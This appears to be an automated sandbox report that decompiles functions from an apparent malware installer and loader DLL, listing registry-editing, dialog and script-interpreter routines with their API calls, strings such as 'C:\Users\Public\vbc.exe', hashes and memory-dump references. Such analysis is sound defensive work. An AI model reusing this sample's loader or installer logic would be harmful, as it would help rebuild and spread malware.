                                                  • String ID: %s$%s already defined$C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$ctx->func->type == FUNC_GLOBAL
                                                  • API String ID: 1832359313-1390408231
                                                  • Opcode ID: 5d93f21ddea5149e6fdb81e91d4179ac06cf72ac73b6d55a1866d577981f64e1
                                                  • Instruction ID: 910a4ae2715ec917930bbc7b31ad57641796912d45fd45f52adc25e098023165
                                                  • Opcode Fuzzy Hash: 5d93f21ddea5149e6fdb81e91d4179ac06cf72ac73b6d55a1866d577981f64e1
                                                  • Instruction Fuzzy Hash: 663160B9E00208EFDB04CF94D885F9EB7B9AF94B05F148598F9095B341E732EA41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                                                  0x00402337
                                                  0x0040233c
                                                  0x00402346
                                                  0x00402350
                                                  0x00402353
                                                  0x0040235d
                                                  0x0040236d
                                                  0x00402374
                                                  0x0040237c
                                                  0x0040238a
                                                  0x0040238e
                                                  0x00402399
                                                  0x00402399
                                                  0x0040239d
                                                  0x004023a1
                                                  0x004023a7
                                                  0x004023ac
                                                  0x004023ac
                                                  0x004023b0
                                                  0x004023bc
                                                  0x004023bc
                                                  0x004023d5
                                                  0x004023d7
                                                  0x004023d7
                                                  0x004023da
                                                  0x004024b0
                                                  0x004024b0
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskF049.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskF049.tmp,00000000), ref: 004023CD
                                                  • RegCloseKey.ADVAPI32(?), ref: 004024B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskF049.tmp
                                                  • API String ID: 1356686001-3236603736
                                                  • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                  • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                  • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                  • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004038B4, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x520d18
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "jhaljjbgtengrcaq Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x1
						_t27 =  *0x423f68; // 0x520ec4
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x520edc
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                  0x004038b8
                                                  0x004038bd
                                                  0x004038c3
                                                  0x004038c8
                                                  0x004038c8
                                                  0x004038d0
                                                  0x00000000
                                                  0x00000000
                                                  0x004038d2
                                                  0x004038d8
                                                  0x004038e0
                                                  0x004038e2
                                                  0x004038e8
                                                  0x004038e8
                                                  0x004038ea
                                                  0x004038f6
                                                  0x00000000
                                                  0x00000000
                                                  0x004038fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004038fc
                                                  0x00403901
                                                  0x0040390a
                                                  0x00403910
                                                  0x00403915
                                                  0x00403929
                                                  0x00403934
                                                  0x0040394c
                                                  0x00403952
                                                  0x00403957
                                                  0x0040395f
                                                  0x00403980
                                                  0x00403980
                                                  0x00403980
                                                  0x00403961
                                                  0x00403963
                                                  0x00403963
                                                  0x00403967
                                                  0x0040396a
                                                  0x0040396e
                                                  0x0040396e
                                                  0x00403973
                                                  0x00403979
                                                  0x00403979
                                                  0x00000000
                                                  0x00403963
                                                  0x00403917
                                                  0x0040391c
                                                  0x00403925
                                                  0x0040391e
                                                  0x0040391e
                                                  0x0040391e
                                                  0x0040391c

                                                  APIs
                                                  • SetWindowTextA.USER32(00000000,jhaljjbgtengrcaq Setup), ref: 0040394C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\Public\vbc.exe" $1033$8nR$jhaljjbgtengrcaq Setup
                                                  • API String ID: 530164218-1931742771
                                                  • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                  • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                  • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                  • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 730534C0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 19%
                                                  			E730534C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v28;
				intOrPtr _t22;
				void* _t41;
				void* _t42;

				_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 8));
				0x73050000("%#x\n", _v8);
				_t42 = _t41 + 8;
				if(_v8 != 0xffffffff) {
					_t34 = _v8;
					__eflags = _v8 -  *((intOrPtr*)(_a4 + 0x40));
					if(__eflags >= 0) {
						_push(0x59b);
						E73055DA9(__ebx, _t34, __edi, __esi, __eflags, L"n < ctx->top", L"C:\\xampp\\htdocs\\Loct\\87441519555141b6935f4940bcbda0c2\\Loader\\Project4\\Project4\\Source.c");
						_t42 = _t42 + 0xc;
					}
					_v28 = 0;
					_t22 = _a4;
					__imp__#10( &_v28, (_v8 << 4) +  *((intOrPtr*)(_t22 + 0x44)));
					_v12 = _t22;
					__eflags = _v12;
					if(_v12 >= 0) {
						return E73051CD0( &_v28, _a4,  &_v28);
					} else {
						return _v12;
					}
				}
				return 0x800a01f9;
			}









                                                  0x730534cf
                                                  0x730534db
                                                  0x730534e0
                                                  0x730534e7
                                                  0x730534f3
                                                  0x730534f6
                                                  0x730534f9
                                                  0x730534fb
                                                  0x7305350a
                                                  0x7305350f
                                                  0x7305350f
                                                  0x73053514
                                                  0x7305351e
                                                  0x73053529
                                                  0x7305352f
                                                  0x73053532
                                                  0x73053536
                                                  0x00000000
                                                  0x73053538
                                                  0x00000000
                                                  0x73053538
                                                  0x73053536
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  • n < ctx->top, xrefs: 73053505
                                                  • %#x, xrefs: 730534D6
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 73053500
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CopyVariant__wassert
                                                  • String ID: %#x$C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$n < ctx->top
                                                  • API String ID: 3580881739-437735780
                                                  • Opcode ID: b9f75ef1355ea5f4313022338d8d134cc76c966bb8912d132c4bd7c4e66a062f
                                                  • Instruction ID: ad21f6371848e9b7f105c330eaf83e5bd0f5e7543c6be028e4da6b724a4b0d24
                                                  • Opcode Fuzzy Hash: b9f75ef1355ea5f4313022338d8d134cc76c966bb8912d132c4bd7c4e66a062f
                                                  • Instruction Fuzzy Hash: D311A575A00208EFDB05DF98D945F9D7BB5AF84B10F508294F9095B345E331EA41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                                                  0x00402a79
                                                  0x00402a8a
                                                  0x00402a92
                                                  0x00402aba
                                                  0x00402aa1
                                                  0x00402aa4
                                                  0x00402af4
                                                  0x00402afa
                                                  0x00402afc
                                                  0x00000000
                                                  0x00402afc
                                                  0x00402ab1
                                                  0x00402ab6
                                                  0x00402ab8
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ab8
                                                  0x00402acf
                                                  0x00402ad7
                                                  0x00402ade
                                                  0x00402b04
                                                  0x00402b0a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b12
                                                  0x00402b18
                                                  0x00402b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402b1a
                                                  0x00000000
                                                  0x00402aed
                                                  0x00402b01

                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                  • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                  • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                  • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                  0x00401ce8
                                                  0x00401cef
                                                  0x00401d1e
                                                  0x00401d26
                                                  0x00401d2d
                                                  0x00401d2d
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                  • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                  • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                  • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73055040, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID: Unhandled type %s$Unhandled type %s
                                                  • API String ID: 1473721057-2321949016
                                                  • Opcode ID: 519ec333494377545fae23fb217365cbdd7cfc05fd6c9b39aecbdf8ae61144d2
                                                  • Instruction ID: c129618b7dff374d1c841190358bb15ac914d4ec01690c751394081d50d29687
                                                  • Opcode Fuzzy Hash: 519ec333494377545fae23fb217365cbdd7cfc05fd6c9b39aecbdf8ae61144d2
                                                  • Instruction Fuzzy Hash: ED517DF6D00208EBDB00CB94C844FAEBBBABF44B05F548558F4166B280E7759A85CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73053DA0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 35%
                                                  			E73053DA0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				char _v36;
				short _v44;
				char _v52;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t59;
				intOrPtr _t67;
				void* _t71;
				void* _t93;
				void* _t94;

				_t94 = __esi;
				_t93 = __edi;
				_t71 = __ebx;
				_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0xc));
				_t52 = _v12;
				0x73050000(_t52);
				0x73050000("%s\n", _t52);
				_v52 = 2;
				_v44 = 0;
				_push(0);
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)))));
				_push( &_v52);
				_t55 = E73051C90(_a4, 0);
				_push(_t55);
				L73055DA3();
				_v8 = _t55;
				if(_v8 >= 0) {
					if(_v8 == 2 || _v8 == 1) {
						_v16 = 1;
					} else {
						_v16 = 0;
					}
					_v24 = _v16;
					_v8 = E73051730(_t71, _t93, _t94, _a4, _v12, 3,  &_v36);
					if(_v8 >= 0) {
						if(_v36 == 2) {
							_push(0);
							_push( *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)))));
							_t59 = E73051C90(_a4, 1);
							_push(_t59);
							_push(_v32);
							L73055DA3();
							_v8 = _t59;
							if(_v8 >= 0) {
								if(_v8 == 1) {
									L17:
									 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 0x10;
									L19:
									return 0;
								}
								if(_v24 == 0) {
									_v20 = 2;
								} else {
									_v20 = 0;
								}
								if(_v8 != _v20) {
									E73051DA0(_a4, _a4, 2);
									E73052230(_a4,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 8)));
									goto L19;
								} else {
									goto L17;
								}
							}
							return _v8;
						}
						_t67 = _v12;
						0x73050000(_t67);
						0x73050000("%s is not REF_VAR\n", _t67);
						return 0x80004005;
					} else {
						return _v8;
					}
				}
				return _v8;
			}



















                                                  0x73053da0
                                                  0x73053da0
                                                  0x73053da0
                                                  0x73053daf
                                                  0x73053db2
                                                  0x73053db6
                                                  0x73053dc4
                                                  0x73053dd1
                                                  0x73053dd7
                                                  0x73053ddb
                                                  0x73053de5
                                                  0x73053de9
                                                  0x73053df0
                                                  0x73053df8
                                                  0x73053df9
                                                  0x73053dfe
                                                  0x73053e05
                                                  0x73053e13
                                                  0x73053e24
                                                  0x73053e1b
                                                  0x73053e1b
                                                  0x73053e1b
                                                  0x73053e2e
                                                  0x73053e47
                                                  0x73053e4e
                                                  0x73053e5c
                                                  0x73053e82
                                                  0x73053e8c
                                                  0x73053e93
                                                  0x73053e9b
                                                  0x73053e9f
                                                  0x73053ea0
                                                  0x73053ea5
                                                  0x73053eac
                                                  0x73053eb7
                                                  0x73053ed7
                                                  0x73053ee3
                                                  0x73053f0c
                                                  0x00000000
                                                  0x73053f0c
                                                  0x73053ebd
                                                  0x73053ec8
                                                  0x73053ebf
                                                  0x73053ebf
                                                  0x73053ebf
                                                  0x73053ed5
                                                  0x73053eee
                                                  0x73053f04
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73053ed5
                                                  0x00000000
                                                  0x73053eae
                                                  0x73053e5e
                                                  0x73053e62
                                                  0x73053e70
                                                  0x00000000
                                                  0x73053e50
                                                  0x00000000
                                                  0x73053e50
                                                  0x73053e4e
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 73051C90: __wassert.LIBCMT ref: 73051CAD
                                                  • VarCmp.OLEAUT32(00000000,00000000,00000000), ref: 73053DF9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __wassert
                                                  • String ID: %s$%s is not REF_VAR
                                                  • API String ID: 3993402318-3263974225
                                                  • Opcode ID: 91d2a7298baf52e009b7ea2acf7445b77b7bec71e88e5824d3bd0ff3676451e6
                                                  • Instruction ID: 100050122580b0d986074ffcecc576978ac52be6903395eca0add42f678d8747
                                                  • Opcode Fuzzy Hash: 91d2a7298baf52e009b7ea2acf7445b77b7bec71e88e5824d3bd0ff3676451e6
                                                  • Instruction Fuzzy Hash: CF413DB5E00208EBDB05DF94D945F9EB7B9AF84B04F148598F805AB281D372EA41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                                                  0x0040464f
                                                  0x00404654
                                                  0x0040465c
                                                  0x0040465d
                                                  0x0040466a
                                                  0x00404672
                                                  0x00404673
                                                  0x00404675
                                                  0x00404677
                                                  0x00404679
                                                  0x0040467c
                                                  0x0040467c
                                                  0x00404683
                                                  0x00404689
                                                  0x00404689
                                                  0x00404690
                                                  0x00404697
                                                  0x0040469a
                                                  0x0040469d
                                                  0x0040469d
                                                  0x004046a1
                                                  0x004046b1
                                                  0x004046b3
                                                  0x004046b6
                                                  0x0040465f
                                                  0x0040465f
                                                  0x00404666
                                                  0x00404666
                                                  0x004046be
                                                  0x004046c9
                                                  0x004046df
                                                  0x004046ef
                                                  0x0040470b

                                                  APIs
                                                  • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                  • wsprintfA.USER32 ref: 004046EF
                                                  • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                  • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                  • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                  • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E00401BCA() {
				signed int _t28;
